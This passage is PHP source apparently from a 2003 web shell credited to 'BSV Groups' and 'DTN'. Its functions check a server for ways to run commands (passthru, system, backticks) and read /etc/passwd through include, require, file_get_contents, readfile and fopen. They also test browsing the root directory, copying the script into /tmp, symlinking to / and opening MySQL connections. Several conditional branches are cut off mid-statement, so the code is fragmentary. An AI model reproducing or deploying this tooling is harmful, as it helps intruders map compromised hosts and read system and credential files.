$this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); } echo ""; $this->output_state(1, "system "); $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system "); } //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); } if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; } } function reading_checks($file = "/etc/passwd") { if (@function_exists("require_once")) { if (@require_once($file)) { $this->output_state(1, 
"require_once"); $sys = true; } else { $this->output_state(0, "require_once"); } } if (@function_exists("require")) { if (@require($file)) { $this->output_state(1, "require"); $sys = true; } else { $this->output_state(0, "require"); } } if (@function_exists("include")) { if (@include($file)) { $this->output_state(1, "include "); $sys = true; } else { $this->output_state(0, "include "); } } if (@function_exists("file_get_contents")) { if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); } } else { $this->output_state(0, "filegetcontents"); } echo ""; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); } echo ""; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); } if (@fopen($file, "r")) { $this->output_state(1, "fopen "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen "); } if (@file($file)) { $this->output_state(1, "file "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file "); } if ($sys) { return 1; } else { return ; } } function miscfile_checks() { $currentdir = @getcwd(); $scriptpath = $_SERVER["PATH_TRANSLATED"]; if (@opendir($currentdir)) { $this->output_state(2, "opendir \$cwd"); $dp = @opendir("$currentdir"); $files=""; $this->browse_state = "lim"; while($file = @readdir($dp)) { $files .= $file; } if (@strstr($files, '.')) { $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); } } else { $this->output_state(0, "opendir \$cwd"); } if (@opendir("/")) { $this->output_state(1, "opendir /"); $sys = true; $dp = @opendir("/"); $this->browse_state = "yes"; $files=""; while($file = @readdir($dp)) { $files .= $file; } if (@strstr($files, '.')) { $this->output_state(1, 
"readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); } } else { $this->output_state(0, "opendir /"); } if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir "); $sys = true; } else { $this->output_state(0, "mkdir "); } if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir "); $sys = true; } else { $this->output_state(0, "rmdir "); } if (@copy($scriptpath, "$currentdir/copytest")) { $this->output_state(2, "copy "); $sys = true; if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } else { $this->output_state(0, "copy "); } if (@copy($scriptpath, "/tmp/copytest")) { $this->output_state(2, "copy2/tmp"); //$sys = true; if (!$del) { if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "copy2/tmp"); } if (@link("/", "$currentdir/link2root")) { $this->output_state(1, "link "); $sys = true; if (!$del) { if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "link "); } if (@symlink("/", "$currentdir/link2root")) { $this->output_state(1, "symlink "); $sys = true; if (!$del) { if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink "); $del = true; } else { $this->output_state(0, "unlink "); } } } else { $this->output_state(0, "symlink "); } if ($sys) { return 1; } else { return ; } } function mysql_checks() { if ($this->mysql_do=="yes") { if (@mysql_pconnect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { $this->output_state(1, "mysql_pconnect"); $mstate = 1; $this->mysql_state = "ok"; } else { $this->output_state(0, "mysql_pconnect"); $mstate = 0; $this->mysql_state = "fail"; } } else { $this->output_state(3, "mysql_pconnect"); $mstate = 2; $this->mysql_state = "pass"; } if 
($this->mysql_do=="yes") { if (@mysql_connect($this->mysql_host, $this->mysql_user, $this->mysql_pass)) { $this->output_state(1, "mysql_connect"); $mstate = 1; $this->mysql_state = "ok"; } else { $this->output_state(0, "mysql_connect"); $mstate = 0; $this->mysql_state = "fail"; } } else { $this->output_state(3, "mysql_connect"); $mstate = 2; $this->mysql_state = "pass"; } if ($this->mysql_state=="fail") { echo ""; echo ""; } return $mstate; } } // the end :] ?>
Copyright © 2003 BSV Groups
PHP Shell Support by DTN